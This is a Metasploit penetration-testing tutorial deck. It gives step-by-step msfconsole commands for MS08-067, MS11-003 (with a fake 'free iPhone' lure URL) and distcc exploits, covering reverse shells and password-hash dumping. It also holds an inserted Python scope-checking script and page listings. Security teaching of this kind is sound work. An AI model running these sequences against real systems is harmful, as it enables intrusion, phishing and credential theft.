Pen-Testing With Metasploit. By Mohammed Danish Amber
AGENDA ▪ Why & What's Pen-Testing ▪ About Metasploit ▪ Metasploit Basic & Meterpreter ▪ Demo
Mohammed Danish Amber ▪ Geek & Security Analyst ▪ Information Security Enthusiast ▪ Working in TCS ▪ Lecturer & Engineer ▪ Collaborative Project - Hacker Ecosystem ▪ Make the Internet a Secure Place
Why Pen-Testing ▪ Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches ▪ A penetration test is one of the most effective ways to identify weaknesses and deficiencies in these programs
What's Pen-Testing ▪ A method to evaluate the security of a computer system / network ▪ Practice (attacking) an IT system like a ‘hacker’ does – Find security holes (weaknesses) – Bypass security mechanisms – Compromise an organization’s IT system security ▪ MUST HAVE PERMISSION FROM THE IT SYSTEM OWNER: ILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
ETHICS ▪ THINK BEFORE YOU ACT ▪ DON'T BE STUPID ▪ DON'T BE MALICIOUS
PEN-TESTING PHASES ▪ INFORMATION GATHERING ▪ VULNERABILITY ANALYSIS ▪ EXPLOITATION ▪ POST EXPLOITATION ▪ REPORTING
Metasploit ▪ Not just a tool but an entire framework ▪ An open-source platform for writing security tools and exploits ▪ Easily build attack vectors from its exploits, payloads and encoders ▪ Create and execute more advanced attacks ▪ Ruby based
Metasploit Interfaces ▪ MSFconsole ▪ msfweb, msfgui (discontinued) ▪ Metasploit Pro & Community Edition ▪ Armitage
MSFconsole
MSFcli
Metasploit Terminology ▪ Exploit: Code that allows a pentester to take advantage of a flaw within a system, application, or service ▪ Payload: Code that we want the target system to execute (a few commands to be executed on the target system) ▪ Shellcode: A set of instructions used as the payload when exploitation occurs ▪ Module: A piece of software that can be used by Metasploit ▪ Listener: A component waiting for an incoming connection
How does Exploitation work? ▪ Attacker sends: Exploit + Payload ▪ Vulnerable Server: Exploit runs + Payload runs ▪ Upload + download DATA
Meterpreter ▪ Used as the payload after a vulnerability is exploited ▪ Improves post exploitation
Meterpreter ▪ Exploit a vulnerability ▪ Select Meterpreter as the payload ▪ Meterpreter shell
Meterpreter Commands
Windows XP Exploitation ▪ msf > search windows/smb ▪ msf > info exploit/windows/smb/ms08_067_netapi ▪ msf > use exploit/windows/smb/ms08_067_netapi ▪ msf exploit(ms08_067_netapi) > show payloads ▪ msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip> ▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip> ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > exploit ▪ meterpreter > background ▪ msf exploit(ms08_067_netapi) > sessions -l
Windows XP Exploitation ▪ msf exploit(ms08_067_netapi) > sessions -i 1 ▪ meterpreter > getsystem -h ▪ meterpreter > getuid ▪ meterpreter > hashdump
Windows 7 Exploitation ▪ msf > use exploit/windows/browser/ms11_003_ie_css_import ▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms11_003_ie_css_import) > show options ▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <attacker ip> ▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 ▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe ▪ msf exploit(ms11_003_ie_css_import) > set LHOST <attacker ip> ▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443 ▪ msf exploit(ms11_003_ie_css_import) > exploit ▪ Just wait until the victim opens the URL http://<ip>:80/free_iphone6plus.exe
Windows 7 Exploitation ▪ msf exploit(ms11_003_ie_css_import) > sessions -l ▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1 ▪ meterpreter > sysinfo ▪ meterpreter > shell
Ubuntu Exploitation ▪ msf > search distcc ▪ msf > use exploit/unix/misc/distcc_exec ▪ show payloads ▪ set PAYLOAD cmd/unix/reverse ▪ show options ▪ set RHOST <victim ip> ▪ set LHOST <attacker ip>
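The three demos above all hand addresses to the framework with set RHOST / LHOST / SRVHOST, and the deck's own rule is that those addresses must belong to systems the owner has authorized. As an added example (not code from the slides or from the Metasploit project), this Python pre-flight check parses a msfconsole command sequence of that shape and refuses the run when a victim option (RHOST/RHOSTS) falls outside the agreed target ranges or a listener option (LHOST/SRVHOST) is not one of the tester's own hosts; the scope ranges and the addresses in the sample transcripts are constructed, hypothetical lab values.

```python
"""
Pre-flight scope check for a msfconsole command sequence.

Every address handed to the framework is checked against the ranges the
system owner authorized in writing. Victim options (RHOST/RHOSTS) must fall
inside the target scope; listener options (LHOST/SRVHOST) must be one of the
tester's own hosts. A run with any out-of-scope address is refused.
"""
import ipaddress
import re

# Constructed engagement scope for this example (hypothetical lab ranges,
# not values from the original slides).
AUTHORIZED_TARGETS = ["192.168.56.0/24"]   # where authorized victims live
ATTACKER_HOSTS = ["192.168.56.1"]          # where the tester's listeners bind

TARGET_OPTIONS = {"RHOST", "RHOSTS"}       # name the system under test
LOCAL_OPTIONS = {"LHOST", "SRVHOST"}       # name the tester's own machine

# Matches 'set RHOST 192.168.56.101', with or without a leading 'msf ...>' prompt.
SET_RE = re.compile(r"(?:^|>\s*)set\s+(\w+)\s+(\S+)", re.IGNORECASE)


def parse_options(lines):
    """Return {OPTION: value} for every 'set' command in the transcript."""
    opts = {}
    for line in lines:
        m = SET_RE.search(line.strip())
        if m:
            opts[m.group(1).upper()] = m.group(2)
    return opts


def in_scope(value, allowed):
    """True if value is an IP or CIDR fully contained in one of the allowed ranges."""
    try:
        net = ipaddress.ip_network(value, strict=False)
    except ValueError:
        return False  # hostnames and placeholders such as <remote ip> are never accepted
    for cidr in allowed:
        allowed_net = ipaddress.ip_network(cidr)
        if net.version == allowed_net.version and net.subnet_of(allowed_net):
            return True
    return False


def check_transcript(lines, targets=AUTHORIZED_TARGETS, own_hosts=ATTACKER_HOSTS):
    """Return (ok, findings); ok is False when any address falls outside scope."""
    findings = []
    for name, value in parse_options(lines).items():
        if name in TARGET_OPTIONS and not in_scope(value, targets):
            findings.append(f"{name}={value} is outside the authorized target scope")
        elif name in LOCAL_OPTIONS and not in_scope(value, own_hosts):
            findings.append(f"{name}={value} is not one of the tester's own hosts")
    return not findings, findings


# Constructed transcripts mirroring the Windows XP sequence in the slides.
IN_SCOPE_RUN = [
    "msf > use exploit/windows/smb/ms08_067_netapi",
    "msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp",
    "msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101",
    "msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1",
]
OUT_OF_SCOPE_RUN = [
    "msf exploit(ms08_067_netapi) > set RHOST 10.20.30.40",   # not in the authorized /24
    "msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1",
]

if __name__ == "__main__":
    for label, run in (("in-scope", IN_SCOPE_RUN), ("out-of-scope", OUT_OF_SCOPE_RUN)):
        ok, findings = check_transcript(run)
        print(f"{label}: {'proceed' if ok else 'REFUSED'}")
        for f in findings:
            print("  -", f)
```

Placeholders such as <remote ip> deliberately fail the check, so a resource script can only pass once every address has been filled in with an authorized value.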
Any Questions?
Thanks To ▪ Kali / BackTrack Linux ▪ Metasploit Team (HD Moore & Rapid7) ▪ Offensive Security / Metasploit Unleashed ▪ David Kennedy ▪ Georgia Weidman ▪ Null Hyderabad Chapter - CORE TEAM ▪ #nullhyd @
WWW.MOHAMMEDDANISHAMBER.COM

More Related Content

What's hot

Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
Dilum Bandara
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Edureka!
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
Michael Gough
 
Metasploit
MetasploitMetasploit
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
SANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik Kontrolü
Sparta Bilişim
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testing
Mohit Belwal
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Practical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware BehaviorPractical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware Behavior
Sam Bowne
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
MITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdfMITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdf
ReZa AdineH
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Introduction to Snort
Introduction to SnortIntroduction to Snort
Introduction to Snort
Hossein Yavari
 

What's hot (20)

Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
ETHICAL HACKING
ETHICAL HACKING ETHICAL HACKING
ETHICAL HACKING
 
Metaploit
MetaploitMetaploit
Metaploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
Metasploit
MetasploitMetasploit
Metasploit
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
SANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik Kontrolü
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testing
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3
 
Practical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware BehaviorPractical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware Behavior
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
MITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdfMITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdf
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Introduction to Snort
Introduction to SnortIntroduction to Snort
Introduction to Snort
 

Viewers also liked

Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
Muhammad Ridwan
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON
 
Denial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksDenial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity Networks
Jens Oberender
 
Meterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideMeterpreter in Metasploit User Guide
Meterpreter in Metasploit User Guide
Khairi Aiman
 
Ips and-ids
Ips and-idsIps and-ids
Ips and-ids
Adam Viet
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON
 
Messing around avs
Messing around avsMessing around avs
Messing around avs
Shubham Mittal
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren't
pinkflawd
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
44CON
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using MeterpreterShubham Mittal
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
Tom Eston
 
The complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospiceThe complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospice
drucsamal
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)     Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Pham Viet Dung
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe Hacking
Philip Young
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
chungdv
 

Viewers also liked (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves
 
Denial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksDenial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity Networks
 
Meterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideMeterpreter in Metasploit User Guide
Meterpreter in Metasploit User Guide
 
Ips and-ids
Ips and-idsIps and-ids
Ips and-ids
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
 
Messing around avs
Messing around avsMessing around avs
Messing around avs
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren't
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using Meterpreter
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
 
The complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospiceThe complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospice
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)     Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe Hacking
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
 

Similar to Pen-Testing with Metasploit

iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Raghav Bisht
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Real life hacking101
Real life hacking101Real life hacking101
Real life hacking101
Florent Batard
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
Nutan Kumar Panda
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
Ji-Woong Choi
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
IOSR Journals
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
Bryce Kunz
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
Priyanka Aash
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
Nahidul Kibria
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
seastorm44
 

Similar to Pen-Testing with Metasploit (20)

iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Real life hacking101
Real life hacking101Real life hacking101
Real life hacking101
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 

Recently uploaded

Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdfEnhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Jay Das
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
Google
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Globus
 
Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"
Donna Lenk
 
RISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent EnterpriseRISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent Enterprise
Srikant77
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Anthony Dahanne
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
Tendenci - The Open Source AMS (Association Management Software)
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
Globus
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus
 
2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx
Georgi Kodinov
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Mind IT Systems
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdf
Cyanic lab
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
Fermin Galan
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
Globus
 
Vitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume MontevideoVitthal Shirke Microservices Resume Montevideo
Vitthal Shirke Microservices Resume Montevideo
Vitthal Shirke
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
Ortus Solutions, Corp
 
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...Developing Distributed High-performance Computing Capabilities of an Open Sci...
Developing Distributed High-performance Computing Capabilities of an Open Sci...
Globus
 
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Exploring Innovations in Data Repository Solutions - Insights from the U.S. G...
Globus
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns
 

Recently uploaded (20)

Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdfEnhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
 
